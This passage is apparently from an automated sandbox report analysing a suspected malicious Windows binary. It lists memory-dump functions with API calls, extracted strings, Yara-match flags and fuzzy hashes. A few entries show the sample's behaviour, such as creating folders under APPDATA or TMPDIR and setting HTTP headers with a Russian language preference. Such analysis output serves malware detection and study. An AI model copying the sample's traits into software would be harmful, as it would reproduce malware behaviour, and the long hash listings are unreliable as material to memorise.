                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 85fee3f2e8af9a6ebd7aea2a720af6c16bc184e8b2414a8ff4de091aa09b0c6c
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 65110A7F20014247E6188A7DD5B46F7AB97FBC532173D437AD0B24B758D223E9559600
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction ID: a60c24d993cbccf98a249165d32e4b252ecb079773f30f13a6df0b1f2fa8fb70
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: 1A018F76A006148FEB21CF64C804BEB33AAEF86316F4545B5D90A97281E774A9418B90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                  • Instruction ID: 91f9cbf9c998b6b154933009beec7cf969d7c2669516eed5026d1d53449b0fde
                                                  • Opcode Fuzzy Hash: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                  • Instruction Fuzzy Hash: F9E08C72921268EBCB14DBC9CA0498AF3ECEB45B54B1504ABF601D3200C278DE41C7D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                  • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                  • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                  • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                  • Instruction ID: b58ca36229bfd2519ce0c05b71bf02d2c810429cf343892cbcb61b77e4193808
                                                  • Opcode Fuzzy Hash: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                  • Instruction Fuzzy Hash: E2E08C32A11228EBCB25DB98CD04A8AF3EDEB44F00B11849AB905D3200C670DE00CBE0
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 00680725
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9AA
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9BC
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9CE
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9E0
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9F2
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA04
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA16
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA28
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA3A
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA4C
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA5E
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA70
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA82
                                                  • _free.LIBCMT ref: 0068071A
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 0068073C
                                                  • _free.LIBCMT ref: 00680751
                                                  • _free.LIBCMT ref: 0068075C
                                                  • _free.LIBCMT ref: 0068077E
                                                  • _free.LIBCMT ref: 00680791
                                                  • _free.LIBCMT ref: 0068079F
                                                  • _free.LIBCMT ref: 006807AA
                                                  • _free.LIBCMT ref: 006807E2
                                                  • _free.LIBCMT ref: 006807E9
                                                  • _free.LIBCMT ref: 00680806
                                                  • _free.LIBCMT ref: 0068081E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID: qC$PrC
                                                  • API String ID: 161543041-1020004248
                                                  • Opcode ID: 1dfb0f945daf1fa0b5fb901f111b8d9716e603e26c88d85824bdef020c61cf24
                                                  • Instruction ID: d9d121808e5c0c25f0a502ecfdb3cf6c0fdb3c9d5232a1f72ce3e692ec3ac8f7
                                                  • Opcode Fuzzy Hash: 1dfb0f945daf1fa0b5fb901f111b8d9716e603e26c88d85824bdef020c61cf24
                                                  • Instruction Fuzzy Hash: 67312E715047059FFBA1BA38D846B9773EAAF00720F14892DE169D7261DB74BC84CF64
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 004204BE
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F743
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F755
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F767
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F779
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F78B
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F79D
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7AF
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7C1
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7D3
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7E5
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7F7
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F809
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F81B
                                                  • _free.LIBCMT ref: 004204B3
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 004204D5
                                                  • _free.LIBCMT ref: 004204EA
                                                  • _free.LIBCMT ref: 004204F5
                                                  • _free.LIBCMT ref: 00420517
                                                  • _free.LIBCMT ref: 0042052A
                                                  • _free.LIBCMT ref: 00420538
                                                  • _free.LIBCMT ref: 00420543
                                                  • _free.LIBCMT ref: 0042057B
                                                  • _free.LIBCMT ref: 00420582
                                                  • _free.LIBCMT ref: 0042059F
                                                  • _free.LIBCMT ref: 004205B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID: tqC
                                                  • API String ID: 161543041-1967669507
                                                  • Opcode ID: 5f0003f8893cf8ce982a8c0a223b8adfc5b53c17a0bd4eaaadfeec6f99f588fe
                                                  • Instruction ID: 89d3e0614c1888e3876d50c63e7448c9468b58a50f4c13281cf391deb725330b
                                                  • Opcode Fuzzy Hash: 5f0003f8893cf8ce982a8c0a223b8adfc5b53c17a0bd4eaaadfeec6f99f588fe
                                                  • Instruction Fuzzy Hash: 89315D71701615AFEB20AA79E845B9B73E8AF00314F50841BE458D7252DB78EDC0CB29
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: tqC
                                                  • API String ID: 269201875-1967669507
                                                  • Opcode ID: 2e35bd67042b9c7ced78a83742b0d05a9d7f14c4418e5b4e63d8796d7c15fdff
                                                  • Instruction ID: a4bface3bf681dc86b1305e01607c601c26d64039dea510868fa8c22d2e6bb15
                                                  • Opcode Fuzzy Hash: 2e35bd67042b9c7ced78a83742b0d05a9d7f14c4418e5b4e63d8796d7c15fdff
                                                  • Instruction Fuzzy Hash: 72C12771E40205ABDB20DB99CC42FDF77F89F48704F54416AFA05FB282E674AD858BA4
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 539b19e4f89500baa8e73471446f1730a4e52e978371ab8d2f9639197e0c27fd
                                                  • Instruction ID: 1d6b25825914aaa7f5d743abe57cff5c904706fedcceaf39c4cb1f3fede375c7
                                                  • Opcode Fuzzy Hash: 539b19e4f89500baa8e73471446f1730a4e52e978371ab8d2f9639197e0c27fd
                                                  • Instruction Fuzzy Hash: 8BD19C71E00605DFDB11DFA9C881BEEBBB5BF48304F14452EE495A7382D778A885CB68
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 16a18909ecb7dbd131bbabdc069eeb86cdd151f6d1a3fa90edba1b0967e13438
                                                  • Instruction ID: f308487b9ac1238e9615664e10754519775a025b785c0d40311dd0589d4ddc3a
                                                  • Opcode Fuzzy Hash: 16a18909ecb7dbd131bbabdc069eeb86cdd151f6d1a3fa90edba1b0967e13438
                                                  • Instruction Fuzzy Hash: CFD19D719006069FDB11DFB8C881BEEBBF6BF08310F14856DE599A7392D7B1A845CB60
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(004383D4,00000FA0,?,?,0040D002), ref: 0040D030
                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0040D002), ref: 0040D03B
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040D002), ref: 0040D04C
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0040D05E
                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0040D06C
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040D002), ref: 0040D08F
                                                  • DeleteCriticalSection.KERNEL32(004383D4,00000007,?,?,0040D002), ref: 0040D0AB
                                                  • CloseHandle.KERNEL32(00000000,?,?,0040D002), ref: 0040D0BB
                                                  Strings
                                                  • WakeAllConditionVariable, xrefs: 0040D064
                                                  • SleepConditionVariableCS, xrefs: 0040D058
                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040D036
                                                  • kernel32.dll, xrefs: 0040D047
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  • Opcode ID: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                  • Instruction ID: f37fac1021100a0b07756b465630dd6bb0a8df6e755d874f23fa7dde75435285
                                                  • Opcode Fuzzy Hash: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                  • Instruction Fuzzy Hash: C8014431B427215BDA311BB57C0DB5B76989B44B51F55403ABD08E23D4DF79880A866C
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 1000A045
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                                  • _free.LIBCMT ref: 1000A03A
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000A05C
                                                  • _free.LIBCMT ref: 1000A071
                                                  • _free.LIBCMT ref: 1000A07C
                                                  • _free.LIBCMT ref: 1000A09E
                                                  • _free.LIBCMT ref: 1000A0B1
                                                  • _free.LIBCMT ref: 1000A0BF
                                                  • _free.LIBCMT ref: 1000A0CA
                                                  • _free.LIBCMT ref: 1000A102
                                                  • _free.LIBCMT ref: 1000A109
                                                  • _free.LIBCMT ref: 1000A126
                                                  • _free.LIBCMT ref: 1000A13E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                  • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                                  • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                  • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: tqC$xqC
                                                  • API String ID: 269201875-4129656487
                                                  • Opcode ID: 2969aaa2978dc56173ce01a97654427f734e5100fbadfe9224481d52d9be4033
                                                  • Instruction ID: 95aa523987b70945ec47ef040bb827334fc69fac3d8989bbbac4bd7d1d483335
                                                  • Opcode Fuzzy Hash: 2969aaa2978dc56173ce01a97654427f734e5100fbadfe9224481d52d9be4033
                                                  • Instruction Fuzzy Hash: E261E5729003059FDB20DF65D841BEBB7E9EF44310F10456FE946EB281EB74AC868B99
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: tqC$xqC
                                                  • API String ID: 269201875-4129656487
                                                  • Opcode ID: 483479b85544f4c0e5bc80b966f2d9849d8ebacf4ab7436aef7b396eceb881cd
                                                  • Instruction ID: 85b0a1ed9111d11af8d65363d51a460db803eaa873c0ec5191369c4fd4ee16a4
                                                  • Opcode Fuzzy Hash: 483479b85544f4c0e5bc80b966f2d9849d8ebacf4ab7436aef7b396eceb881cd
                                                  • Instruction Fuzzy Hash: FA613A729003059FEB61EF64C841BABB7F6AF44710F14852DE659EB351EB709D04CB54
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0041014F
                                                  • type_info::operator==.LIBVCRUNTIME ref: 00410171
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 00410280
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00410352
                                                  • _UnwindNestedFrames.LIBCMT ref: 004103D6
                                                  • CallUnexpected.LIBVCRUNTIME ref: 004103F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  • Opcode ID: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                  • Instruction ID: 33ac5f0cf36f84a5a8fc87a3d768383b9666724fdb179a46715a8f318e12c727
                                                  • Opcode Fuzzy Hash: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                  • Instruction Fuzzy Hash: 75B19A71800209EFCF24DFA5C9819EFBBB5BF18314B14406BE8106B252D7B9DAD1CB99
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 006703B6
                                                  • type_info::operator==.LIBVCRUNTIME ref: 006703D8
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 006704E7
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 006705B9
                                                  • _UnwindNestedFrames.LIBCMT ref: 0067063D
                                                  • CallUnexpected.LIBVCRUNTIME ref: 00670658
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  • Opcode ID: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                  • Instruction ID: 14477b5f4d4ad050c841c2de1cc7b1e932485e189027bdecbbde654d34999529
                                                  • Opcode Fuzzy Hash: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                  • Instruction Fuzzy Hash: 8AB17D71800209EFEF15DFA4C9419EEBBB6BF04310B14815AE8196B356D731EE51CFA5
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                  • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                  • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                  • String ID: APPDATA$TMPDIR
                                                  • API String ID: 1838500112-4048745339
                                                  • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                  • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                  • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                  • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                  Strings
                                                  • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                  • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                  • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                  • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: HeadersHttpRequest$H_prolog3_
                                                  • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  • API String ID: 1254599795-787135837
                                                  • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                  • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                  • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                  • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                  APIs
                                                  • _free.LIBCMT ref: 00418D21
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 00418D2D
                                                  • _free.LIBCMT ref: 00418D38
                                                  • _free.LIBCMT ref: 00418D43
                                                  • _free.LIBCMT ref: 00418D4E
                                                  • _free.LIBCMT ref: 00418D59
                                                  • _free.LIBCMT ref: 00418D64
                                                  • _free.LIBCMT ref: 00418D6F
                                                  • _free.LIBCMT ref: 00418D7A
                                                  • _free.LIBCMT ref: 00418D88
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 24980b58e591c56d90b73563928cc0ea88e749077af59d9f244bab521c2e98c8
                                                  • Instruction ID: ca178761576a792413d1c748b4aedad8a99fe24d8e3ecdc468f759f73ec23368
                                                  • Opcode Fuzzy Hash: 24980b58e591c56d90b73563928cc0ea88e749077af59d9f244bab521c2e98c8
